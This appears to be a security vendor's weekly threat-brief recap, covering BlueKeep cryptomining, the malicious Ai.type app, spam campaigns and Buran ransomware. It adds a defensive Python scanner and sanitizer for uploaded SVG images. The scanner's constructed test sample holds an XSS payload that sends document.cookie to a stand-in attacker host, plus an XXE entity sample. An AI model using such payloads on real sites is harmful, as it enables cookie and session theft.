Each week, FortiGuard Labs publishes a Threat Brief to subscribers that profiles notable hot topics and threats that were discovered or discussed during the week. Here is a recap of what we are covering in this week’s Threat Brief:
- A public exploit module for the BlueKeep vulnerability (CVE-2019-0708) was added to the open-source Metasploit penetration testing framework in September. We are now seeing attackers deploy that exploit and then install a cryptocurrency miner on the compromised host. Because BlueKeep is a pre-authentication flaw in Windows Remote Desktop Services, it is wormable: a single infected machine could use it to spread to others with no user interaction. Fortunately, this first in-the-wild campaign shows no worm-like capability and is simply being used to generate virtual cash through cryptomining.
- FortiGuard Labs researchers have been assessing web applications that accept and embed Scalable Vector Graphics (SVG) images. SVG is an XML-based vector image format for two-dimensional graphics with support for interactivity and animation. Because an SVG image is an XML text file, it can be created and edited with any text editor as well as with drawing software, and all major modern web browsers render it natively. The same flexibility that makes SVG useful for dynamic web content also introduces security risk: an "image" that can carry script and references to external resources is not a passive asset. We discuss common SVG attack vectors, such as embedding malicious content in an image file that the application then serves to its users.
- Ai.type is a popular Android keyboard app that personalizes your keyboard and includes features such as learning your writing style and auto-correcting typing mistakes. Earlier this year Google removed Ai.type from Google Play after it was identified as malicious, but not before the app had been downloaded on at least 40 million Android devices. Once installed, the app makes suspicious requests that trigger the purchase of premium digital services.
- This week, researchers spotted two large-scale spam campaigns using Excel attachments. The emails were all written in German and urged the recipient to open an invoice in the attached document. Campaigns of this size are unusual, because smaller campaigns evade spam detection more easily. This campaign had shades of a spam campaign FortiGuard Labs published research on earlier this year, except that the earlier campaign targeted Japanese users.
- We also discuss a new Buran ransomware variant, which is sold under the Ransomware-as-a-Service (RaaS) model and delivered by the popular RIG Exploit Kit. Because the RaaS is advertised on Russian-language forums and the malware refuses to run on systems located in Russia, Belarus, and Ukraine, the developers behind Buran are believed to be located in Russia.
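As an added example for the SVG item above (this is not code from the Threat Brief or from FortiGuard Labs), the following Python script shows the kind of check a web application should run on an uploaded SVG before storing or serving it. It parses the file as XML and flags the features that turn an image into an attack vector: `<script>` and `<foreignObject>` elements, `on*` event-handler attributes, `href` values that point at a `javascript:` or `data:` URL or an external host, and DOCTYPE or entity declarations (an XXE hazard for any server-side XML parser). It then strips those features and re-checks the result. The SVG samples, including the `attacker.example` host, are constructed for this example, and the element and attribute lists are a starting point rather than a complete sanitizer policy.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)        # keep <svg xmlns="..."> on re-serialisation
ET.register_namespace("xlink", XLINK_NS)

# Elements that execute script or embed arbitrary foreign content inside an "image".
ACTIVE_ELEMENTS = {"script", "foreignobject"}
# href prefixes that run script or pull content from outside the file.
BAD_HREF_PREFIXES = ("javascript:", "data:", "http:", "https:", "//")


def local(qname: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on qualified names."""
    return qname.rsplit("}", 1)[-1]


def _attr_is_dangerous(attr: str, value: str) -> bool:
    name = local(attr).lower()
    if name.startswith("on"):                       # onload=, onclick=, ...
        return True
    if name == "href":                              # href= and xlink:href=
        return value.strip().lower().startswith(BAD_HREF_PREFIXES)
    return False


def scan_svg(svg_text: str) -> list:
    """Return a list of findings; an empty list means nothing risky was seen."""
    findings = []
    # Entity/DOCTYPE declarations are an XXE and entity-expansion hazard for
    # any server-side XML parser that later processes the upload.
    if re.search(r"<!(DOCTYPE|ENTITY)\b", svg_text, re.IGNORECASE):
        findings.append("DOCTYPE/ENTITY declaration (XXE risk)")
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        findings.append(f"malformed XML: {exc}")
        return findings
    if local(root.tag).lower() != "svg":
        findings.append(f"root element is <{local(root.tag)}>, not <svg>")
    for el in root.iter():
        name = local(el.tag).lower()
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in el.attrib.items():
            if _attr_is_dangerous(attr, value):
                findings.append(f"{local(attr)}={value!r} on <{name}>")
    return findings


def is_safe_svg(svg_text: str) -> bool:
    return not scan_svg(svg_text)


def sanitize_svg(svg_text: str) -> str:
    """Drop active elements and dangerous attributes; re-serialising also drops any DOCTYPE."""
    root = ET.fromstring(svg_text)
    if local(root.tag).lower() != "svg":
        raise ValueError("not an SVG document")
    parent_of = {child: parent for parent in root.iter() for child in parent}
    for el in list(root.iter()):
        if local(el.tag).lower() in ACTIVE_ELEMENTS:
            parent_of[el].remove(el)
            continue
        for attr in list(el.attrib):
            if _attr_is_dangerous(attr, el.attrib[attr]):
                del el.attrib[attr]
    return ET.tostring(root, encoding="unicode")


# Constructed samples for this example, not real captured uploads.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" fill="green"/>
</svg>"""

MALICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(document.domain)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(1)"><text x="10" y="20">click me</text></a>
  <circle cx="50" cy="50" r="40" fill="green"/>
</svg>"""

XXE_SVG = """<?xml version="1.0"?>
<!DOCTYPE svg [ <!ENTITY banner "hello"> ]>
<svg xmlns="http://www.w3.org/2000/svg"><text x="0" y="10">&banner;</text></svg>"""


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG), ("xxe", XXE_SVG)):
        print(label, scan_svg(sample))
    print("sanitized:", scan_svg(sanitize_svg(MALICIOUS_SVG)))
```

In practice a stricter policy is to allowlist the elements and attributes the application actually needs and reject everything else, and to serve user-supplied SVG with `Content-Type: image/svg+xml` plus `Content-Disposition: attachment` or from a separate origin so that any script that slips through does not run in the application's origin.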
Read about the FortiGuard Security Rating Service, which provides security audits and best practices.